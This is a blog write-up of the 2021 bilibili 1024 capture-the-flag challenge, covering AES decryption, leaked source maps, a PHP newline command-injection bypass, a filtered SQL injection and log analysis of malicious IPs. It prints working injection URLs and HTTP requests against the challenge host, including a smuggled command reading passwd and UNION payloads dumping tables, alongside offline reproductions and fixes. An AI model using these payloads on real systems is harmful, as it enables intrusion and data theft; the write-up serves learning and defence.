c1ay's blog

2021 bilibili 1024 Challenge

Word count: 2.1k / Reading time: 10 min
2021/11/04


Security attack & defense

Question 1:

It's 1024 Programmers' Day; join 2233 in the decryption game~
happy_1024_2233:
e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d364
0408abca7deabb96a58f50471171b60e02b1a8dbd32db156

It is AES-ECB, and both the ciphertext and the key are given, so a short script does it (the key is 15 characters, so it has to be null-padded to a 16-byte AES-128 key, and the 48-byte ciphertext ends in PKCS#7 padding that must be stripped):

import binascii
from Crypto.Cipher import AES  # pip install pycryptodome


class AESCipher():
    def __init__(self, key):
        # "happy_1024_2233" is 15 characters; null-pad it to 16 bytes for
        # AES-128-ECB (24 bytes would give AES-192, 32 bytes AES-256).
        self.key = (key + (16 - len(key)) * chr(0)).encode()
        self.BLOCK_SIZE = 16  # bytes
        # PKCS#7 unpad: the last byte is the pad length (48-byte ciphertext,
        # 35-byte flag, so 13 bytes of padding).
        self.unpad = lambda s: s[:-ord(s[len(s) - 1:])]

    def decrypt(self, enc):
        enc = binascii.a2b_hex(enc)  # hex text -> raw ciphertext bytes
        cipher = AES.new(self.key, AES.MODE_ECB)
        return self.unpad(cipher.decrypt(enc)).decode()


print(AESCipher("happy_1024_2233").decrypt(
    "e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d364"
    "0408abca7deabb96a58f50471171b60e02b1a8dbd32db156"))

a1cd5f84-27966146-3776f301-64031bb9

Question 2:

A certain senior front-end developer changed a front-end configuration item
https://security.bilibili.com/sec1024/q/

The hint points at a sourceMap: the production build shipped its .map file, which carries the original source in its sourcesContent array.

Download
https://security.bilibili.com/sec1024/q/js/chunk-4871f04e.e8a41f19.js.map

Restore the original source tree with restore-source-tree.
The flag turns up in home.vue.


36c7a7b4-cda04af0-8db0368d-b5166480
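restore-source-tree simply walks the map's `sources` and `sourcesContent` arrays and writes each original file back to disk. The script below is an added example that does the same thing in Python (it is not the tool's code and not part of the original write-up). The map it parses is a constructed miniature, not the real chunk-4871f04e.e8a41f19.js.map, and the flag string inside it is made up. A .map pulled from a target is untrusted input, so the writer refuses any `sources` entry whose path would escape the output directory; the third entry in the sample exists only to exercise that guard.

```python
import json
import re
import tempfile
from pathlib import Path

# Constructed miniature of a webpack source map (not the real chunk map).
# The third entry is a deliberately hostile path for the traversal guard.
SAMPLE_MAP = json.dumps({
    "version": 3,
    "sources": [
        "webpack:///./src/views/home.vue?1a2b",
        "webpack:///./src/main.js",
        "webpack:///../../outside.txt",
    ],
    "sourcesContent": [
        "<template><div>{{ msg }}</div></template>\n"
        "<script>\nexport default { data() { return { msg: 'hi', flag: 'flag{constructed-example}' } } }\n</script>\n",
        "import Vue from 'vue'\nnew Vue().$mount('#app')\n",
        "should never be written",
    ],
    "mappings": "AAAA",
})


def restore_sources(map_text, out_dir):
    """Write every sourcesContent entry back to disk under out_dir and return
    the relative paths written. Entries whose path would land outside out_dir
    are skipped: the map is attacker-controlled input."""
    smap = json.loads(map_text)
    root = Path(out_dir).resolve()
    written = []
    for src, content in zip(smap.get("sources", []), smap.get("sourcesContent") or []):
        if content is None:
            continue
        rel = re.sub(r"^webpack://[^/]*/", "", src)  # drop webpack:// scheme (+ optional namespace)
        rel = rel.split("?", 1)[0]                    # drop loader query strings (?vue&type=...)
        while rel.startswith("./"):
            rel = rel[2:]
        target = (root / rel).resolve()
        if root not in target.parents:                # path traversal guard
            continue
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
        written.append(target.relative_to(root).as_posix())
    return written


def grep_sources(out_dir, pattern):
    """Search the restored tree line by line; returns (file, lineno, text) hits."""
    rx = re.compile(pattern)
    root = Path(out_dir)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            if rx.search(line):
                hits.append((path.relative_to(root).as_posix(), lineno, line.strip()))
    return hits


def restore_and_search(map_text, pattern):
    """Restore into a fresh temp dir, then grep it. Returns (written, hits)."""
    out_dir = tempfile.mkdtemp(prefix="restored-")
    written = restore_sources(map_text, out_dir)
    return written, grep_sources(out_dir, pattern)


if __name__ == "__main__":
    written, hits = restore_and_search(SAMPLE_MAP, r"flag\{[^}]*\}")
    print("restored:", written)
    for rel, lineno, text in hits:
        print(f"{rel}:{lineno}: {text}")
```

Point `restore_and_search` at the downloaded .map text and a flag-shaped regex; the same loop also surfaces hard-coded API keys and internal hostnames, which is why shipping source maps to production is a finding in its own right.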

Question 3:

PHP is the best language for web programming, but what about other languages?
https://security.bilibili.com/sec1024/q/eval.zip

PHP source:

<?php
/*
bilibili- ( ゜- ゜)つロ 乾杯~
uat: http://192.168.3.2/uat/eval.php
pro: http://security.bilibili.com/sec1024/q/pro/eval.php
*/
$args = @$_GET['args'];
if (count($args) > 3) {
    exit();
}
for ($i = 0; $i < count($args); $i++) {
    if (!preg_match('/^\w+$/', $args[$i])) {
        exit();
    }
}
// todo: other filter
$cmd = "/bin/2233 " . implode(" ", $args);
exec($cmd, $out);
for ($i = 0; $i < count($out); $i++) {
    echo($out[$i]);
    echo('<br>');
}
?>

The `$` anchor in preg_match can be bypassed with a %0A newline: without the D (dollar-end-only) modifier, PCRE's `$` also matches just before a trailing newline, so `x\n` satisfies `/^\w+$/`. exec() hands the assembled string to /bin/sh, where that newline terminates the `/bin/2233 x` command and the following argument runs as a second command:

https://security.bilibili.com/sec1024/q/pro/eval.php?args[0]=x%0A&args[1]=ls

https://security.bilibili.com/sec1024/q/pro/eval.php?args[0]=x%0A&args[1]=cat&args[2]=passwd

9d3c3014-6c6267e7-086aaee5-1f18452a
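The same `$` behaviour exists in Python's re module (its `$` also matches before a final newline), so the filter and the command assembly can be reproduced without touching the challenge server. This is an added example, not the challenge's code: `CHALLENGE_RE` mirrors the PHP pattern, `build_command` mirrors the `implode`, `shell_commands` shows how /bin/sh would split the result (nothing is executed), and `hardened_argv` shows the fix: anchor with `\Z` (PCRE `\z`, or the `/D` modifier) and pass an argv list instead of a shell string. `/bin/2233` is the challenge binary and is only used as a string here.

```python
import re

# The challenge's filter, transliterated: PHP's /^\w+$/ (no D modifier) and
# Python's default ^\w+$ both let `$` match just before a trailing newline,
# so "x\n" passes.
CHALLENGE_RE = re.compile(r"^\w+$")
# Hardened: \Z (PCRE: \z, or the /D modifier) only matches at the true end of
# the string, so a trailing newline is rejected.
STRICT_RE = re.compile(r"\A\w+\Z")


def passes_filter(args, pattern=CHALLENGE_RE):
    """Mirror of the PHP checks: at most 3 args, each must match the pattern."""
    return len(args) <= 3 and all(pattern.match(a) for a in args)


def build_command(args):
    """Mirror of: $cmd = "/bin/2233 " . implode(" ", $args);"""
    return "/bin/2233 " + " ".join(args)


def shell_commands(cmd):
    """exec() runs $cmd through /bin/sh, which treats an unquoted newline as a
    command separator, just like ';'. Returns the separate commands the shell
    would see, without running anything."""
    return [part.strip() for part in cmd.split("\n") if part.strip()]


def hardened_argv(args):
    """Fix: validate with the strict pattern and never go through a shell.
    Run the returned list with subprocess.run(argv) (shell=False); the PHP
    equivalent is escapeshellarg() on every argument."""
    if not passes_filter(args, STRICT_RE):
        raise ValueError("rejected argument")
    return ["/bin/2233", *args]


if __name__ == "__main__":
    payload = ["x\n", "cat", "passwd"]  # args[0]=x%0A&args[1]=cat&args[2]=passwd
    print("challenge filter passes:", passes_filter(payload))
    print("shell would run:", shell_commands(build_command(payload)))
    print("strict filter passes:", passes_filter(payload, STRICT_RE))
```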

Question 4:

SQL injection in the log-list API.

Spaces break the injection (they are filtered), so use inline comments `/**/` in place of every space. The payload works without a closing quote, so the `user_name` value is evidently interpolated into the query unquoted; the first query dumps the table names of the current database:

POST /sec1024/q/admin/api/v1/log/list HTTP/1.1
Host: security.bilibili.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 190
Origin: https://security.bilibili.com
Connection: close
Referer: https://security.bilibili.com/sec1024/q/
{"user_id":"","user_name":"1/**/union/**/select/**/1,group_concat(table_name),3,4,5/**/from/**/information_schema.tables/**/where/**/table_schema=database()#","action":"","page":1,"size":20}

Single quotes also break the injection, so the string literal is hex-encoded instead: MySQL accepts `0x666c6167` ('flag') as a string in the comparison. This lists the columns of the `flag` table:

POST /sec1024/q/admin/api/v1/log/list HTTP/1.1
Host: security.bilibili.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 190
Origin: https://security.bilibili.com
Connection: close
Referer: https://security.bilibili.com/sec1024/q/
{"user_id":"","user_name":"1/**/union/**/select/**/1,group_concat(column_name),3,4,5/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167#","action":"","page":1,"size":20}

POST /sec1024/q/admin/api/v1/log/list HTTP/1.1
Host: security.bilibili.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 111
Origin: https://security.bilibili.com
Connection: close
Referer: https://security.bilibili.com/sec1024/q/
{"user_id":"","user_name":"1/**/union/**/select/**/1,id,3,4,5/**/from/**/flag#","action":"","page":1,"size":20}

3d5dd579-0678ef93-18b70cae-cabc5d51
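The three payloads above, reproduced against a constructed SQLite database so the mechanics can be stepped through offline. This is an added example, not the challenge's code or the write-up's. It assumes what the page's behaviour implies: the server concatenates `user_name` into the query unquoted and rejects spaces and single quotes. SQLite stands in for MySQL, so `sqlite_master` replaces `information_schema.tables`, `char()` replaces the `0x...` literal (the MySQL hex form is still produced by `hex_literal`), and the trailing `#` comment is dropped because SQLite does not recognise it. The flag value and log rows are made up.

```python
import sqlite3

# Constructed stand-in for the challenge database: a 5-column log table (the
# page's UNION payloads select 5 columns) and a flag table with an id column.
SCHEMA = """
CREATE TABLE log (id INTEGER, user_id TEXT, user_name TEXT, action TEXT, ts TEXT);
INSERT INTO log VALUES (1, '10', 'alice', 'login',  '2021-10-18T02:00:04+0000');
INSERT INTO log VALUES (2, '11', 'bob',   'logout', '2021-10-18T02:00:05+0000');
CREATE TABLE flag (id TEXT);
INSERT INTO flag VALUES ('flag-value-constructed');
"""


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def naive_filter(value):
    """Models the behaviour observed on the page: a space or a single quote in
    user_name makes the request fail. Nothing else is checked."""
    if " " in value or "'" in value:
        raise ValueError("blocked: space or quote in input")
    return value


def filter_blocks(value):
    """True if naive_filter would reject the value."""
    try:
        naive_filter(value)
    except ValueError:
        return True
    return False


def vulnerable_list(con, user_name):
    """String-concatenated query with user_name interpolated unquoted, which is
    what a leading '1/**/union...' working without a closing quote implies."""
    sql = ("SELECT id,user_id,user_name,action,ts FROM log WHERE user_name = "
           + naive_filter(user_name))
    return con.execute(sql).fetchall()


def safe_list(con, user_name):
    """Parameterised version: the payload is bound as data, never parsed as SQL."""
    return con.execute(
        "SELECT id,user_id,user_name,action,ts FROM log WHERE user_name = ?",
        (user_name,)).fetchall()


def hex_literal(s):
    """MySQL quote-free string literal: 'flag' -> 0x666c6167 (the page's form)."""
    return "0x" + s.encode().hex()


def char_literal(s):
    """Quote-free string that MySQL and SQLite both accept: 'flag' -> char(102,108,97,103)."""
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def spaceless(sql):
    """Replace every space with an inline comment, as the page's payloads do."""
    return sql.replace(" ", "/**/")


# Adapted from the page's payloads (sqlite_master for information_schema.tables,
# char() for the 0x literal, no trailing '#').
LIST_TABLES = spaceless("1 union select 1,group_concat(name),3,4,5 from sqlite_master where type="
                        + char_literal("table"))
READ_FLAG = spaceless("1 union select 1,id,3,4,5 from flag")

if __name__ == "__main__":
    con = connect()
    print("filter blocks plain payload:", filter_blocks("1 union select 1,2,3,4,5 from flag"))
    print("tables:", vulnerable_list(con, LIST_TABLES))
    print("flag:  ", vulnerable_list(con, READ_FLAG))
    print("parameterised:", safe_list(con, READ_FLAG))
```

The space and quote filters change the payload's spelling, not its meaning; `safe_list` shows the only fix that does, binding the value so the database never parses it as SQL.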

Question 7:

Security researcher Xiao Sun noticed a wave of abnormal traffic hitting the site this morning. He has done a first pass of filtering the suspicious requests; help him find all the malicious IPs.
Flag format: once you have found all the malicious IPs, join them into a single comma-separated string and submit it; the system scores by the number of correct IPs submitted.
PS: you may send your solution write-up to security@bilibili.com with the subject 1024-sec-r7-[your mid]. We will pick 3 for an extra surprise.

The challenge is titled "risk control". Auditing the log traffic turned up no obvious attack payloads, so I focused on how many times each IP appears at a given timestamp: if an IP issues many requests within the same second, I count it as malicious.

Step 1: use Sublime's regex find-and-replace to extract the timestamp (@timestamp) and IP (x_backend_bili_real_ip) from each log entry.

Step 2: count the occurrences of each of the 481,888 timestamps extracted in step 1 (only 302 distinct timestamps remain after dedup), giving each second and the number of HTTP requests in it.

Step 3: import the timestamps and IPs from step 1 into a database so they can be aggregated.

create database bilibili1024;
use bilibili1024;
create table fengkong(id int unsigned not null auto_increment primary key,tmptime varchar(100) not null,ip varchar(100) not null);
insert into fengkong(tmptime,ip) value("2021-10-18T02:00:04+0000","gg.cej.hd.bii");
...
...
...

Step 4: count how many times each IP appears at each timestamp.

Rule: select IPs that appear more than 100 times at a single timestamp (100 may be too high; lower it as needed, e.g. step through 10, 15, 20, 25 … 100).

This is a MySQL aggregate query plus a subquery, one statement per timestamp:

calc.sql

select * from (select ip,count(*) as count from fengkong where tmptime="2021-10-18T02:00:03+0000" group by ip)x where x.count>100;
select * from (select ip,count(*) as count from fengkong where tmptime="2021-10-18T02:00:04+0000" group by ip)x where x.count>100;
...

A PHP script runs the statements in calc.sql in bulk and collects the results:

<?php
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "bilibili1024";
$lines = file("calc.sql");   // one SELECT per line, as in calc.sql above

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
foreach ($lines as $line) {
    $sql = rtrim($line);
    if ($sql === "") {
        continue;                // skip blank lines
    }
    //print("$sql\n");
    $result = $conn->query($sql);
    if ($result === false) {     // query() returns false on a SQL error
        fwrite(STDERR, "query failed: " . $conn->error . "\n");
        continue;
    }
    // Output one "<count>\t<ip>" row per IP over the threshold
    while ($row = $result->fetch_assoc()) {
        echo $row['count'] . "\t" . $row['ip'] . "\n";
    }
    $result->free();
}
$conn->close();
?>
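The four steps above (extract, count, load, aggregate per timestamp) condensed into one script, as an added example that is not part of the original write-up. It parses constructed JSON log lines carrying the same `@timestamp` and `x_backend_bili_real_ip` fields, applies the page's per-timestamp rule with a configurable threshold, and also implements a sliding-window variant that catches a client spreading its requests over several seconds to stay under a per-second limit. The log lines, IPs and thresholds are made up; the real log format may carry more fields than the two used here.

```python
import json
from collections import Counter, defaultdict
from datetime import datetime


def _entry(ts, ip):
    # Constructed log line: only the two fields the write-up extracts matter.
    return json.dumps({"@timestamp": ts, "x_backend_bili_real_ip": ip, "path": "/x/web-interface/nav"})


SAMPLE_LOG = "\n".join(
    [_entry("2021-10-18T02:00:04+0000", "10.0.0.1")] * 5                      # 5 hits in one second
    + [_entry("2021-10-18T02:00:%02d+0000" % s, "10.0.0.2") for s in range(6)]  # 1 hit/s for 6 s
    + [_entry("2021-10-18T02:00:04+0000", "10.0.0.3"),                        # ordinary client
       _entry("2021-10-18T02:00:07+0000", "10.0.0.3")]
)


def parse_events(log_text):
    """Step 1: pull (timestamp, ip) out of every JSON log line; skip malformed lines."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            obj = json.loads(line)
            events.append((obj["@timestamp"], obj["x_backend_bili_real_ip"]))
        except (ValueError, KeyError):
            continue
    return events


def count_per_second(events):
    """Steps 2-4 in memory: the same (tmptime, ip) GROUP BY the write-up runs in MySQL."""
    return Counter(events)


def flag_burst_ips(events, threshold):
    """The write-up's rule: any IP seen more than `threshold` times at one timestamp."""
    return {ip for (ts, ip), n in count_per_second(events).items() if n > threshold}


def _epoch(ts):
    return int(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S%z").timestamp())


def flag_window_ips(events, threshold, window_seconds):
    """Generalisation: more than `threshold` requests from one IP inside any
    window of `window_seconds`, so a client pacing itself just under the
    per-second limit is still caught."""
    by_ip = defaultdict(list)
    for ts, ip in events:
        by_ip[ip].append(_epoch(ts))
    flagged = set()
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window_seconds:
                start += 1
            if end - start + 1 > threshold:
                flagged.add(ip)
                break
    return flagged


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LOG)
    print("per-second rule (>3):", sorted(flag_burst_ips(ev, 3)))
    print("10 s window rule (>3):", sorted(flag_window_ips(ev, 3, 10)))
```

Feed the real log to `parse_events` and sweep `threshold` downwards as the write-up suggests; `flag_window_ips` with a window of a few seconds is the variant to try when the per-second rule keeps reporting "most, but not all".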

Results (count, then IP):

112 bfh.ff.dj.jf
106 bfh.ff.dj.jf
106 bfh.ff.dj.jf
109 bfh.ff.dj.jf
107 bfh.ff.dj.jf
110 bfh.ff.dj.jf
115 bfh.ff.dj.jf
113 bfh.ff.dj.jf
122 bfh.ff.dj.jf
137 bfh.ff.dj.jf
798 cd.baf.cae.cbc
1652 cd.baf.cae.cbc
2805 cd.baf.cae.cbc
1546 cd.bb.cai.cbh
1563 cdd.bcc.bg.bib
1520 dc.bcc.bg.bib
1577 cd.bb.cai.cbh
1566 cdd.bcc.bg.bib
1562 dc.bcc.bg.bib
1569 cd.bb.cai.cbh
1551 cdd.bcc.bg.bib
1506 dc.bcc.bg.bib
4735 cd.baf.cae.cbc
1564 cd.bb.cai.cbh
1539 cdd.bcc.bg.bib
1535 dc.bcc.bg.bib
1578 cd.bb.cai.cbh
1589 cdd.bcc.bg.bib
1568 dc.bcc.bg.bib
2461 bba.ja.cca.beg
2424 bba.ja.ccb.cbc
2578 bbb.bb.bjd.bgc
2494 bbb.bb.bjd.bgg
2448 bbb.bb.bjd.bha
2619 bbb.bb.bjd.bhc
2539 bbb.bb.bjd.bhf
2517 bba.ja.cca.beg
2525 bba.ja.ccb.cbc
2542 bbb.bb.bjd.bgc
2563 bbb.bb.bjd.bgg
2473 bbb.bb.bjd.bha
2539 bbb.bb.bjd.bhc
2427 bbb.bb.bjd.bhf
2569 bba.ja.cca.beg
2491 bba.ja.ccb.cbc
2504 bbb.bb.bjd.bgc
2566 bbb.bb.bjd.bgg
2534 bbb.bb.bjd.bha
2636 bbb.bb.bjd.bhc
2521 bbb.bb.bjd.bhf
9531 cde.ced.bbb.dd
9469 dc.bb.ii.jj
9587 jj.bdc.bbb.cc
9406 cde.ced.bbb.dd
9370 dc.bb.ii.jj
9451 jj.bdc.bbb.cc
9559 cde.ced.bbb.dd
9302 dc.bb.ii.jj
9414 jj.bdc.bbb.cc
18854 cde.ced.bbb.dd
18869 dc.bb.ii.jj
18882 jj.bdc.bbb.cc

After dedup, the IPs with more than 100 requests at some single timestamp:

bba.ja.cca.beg,bba.ja.ccb.cbc,bbb.bb.bjd.bgc,bbb.bb.bjd.bgg,bbb.bb.bjd.bha,bbb.bb.bjd.bhc,bbb.bb.bjd.bhf,bfh.ff.dj.jf,cd.baf.cae.cbc,cd.bb.cai.cbh,cdd.bcc.bg.bib,cde.ced.bbb.dd,dc.bb.ii.jj,dc.bcc.bg.bib,jj.bdc.bbb.cc

But submitting this still returned: "Congratulations, you found most of the IP addresses; keep going."

Lowering the rule from more than 100 to more than 30 requests per timestamp still gave the "not enough" message.

Process of elimination:

By experimenting I inferred the likely scoring rule: if (number of IPs submitted - number wrong) >= 8, the submission passes and shows "Congratulations, you found most of the IP addresses". Under that rule, elimination shows the following 13 IPs are definitely correct:

bba.ja.cca.beg,bba.ja.ccb.cbc,bbb.bb.bjd.bgc,bbb.bb.bjd.bgg,bbb.bb.bjd.bha,bbb.bb.bjd.bhc,bbb.bb.bjd.bhf,cd.bb.cai.cbh,cdd.bcc.bg.bib,cde.ced.bbb.dd,dc.bb.ii.jj,dc.bcc.bg.bib,jj.bdc.bbb.cc

But submitting them still only scored 10 points.

Other approaches:

1. Select malicious IPs by the number of requests from the same device (by User-Agent) within a time window; but this selects far too many IPs and the submission is rejected.

2. Browsing the logs shows many Baidu, Google and Bing crawler requests, but I don't count crawlers as malicious, since a site sometimes needs them for SEO.

3. Endpoints that return sensitive information:
/activity/account/check/myinfo.
/account/history.

But these endpoints have no authorization bypass, and the IPs found this way are almost identical to those found by the timestamp method.
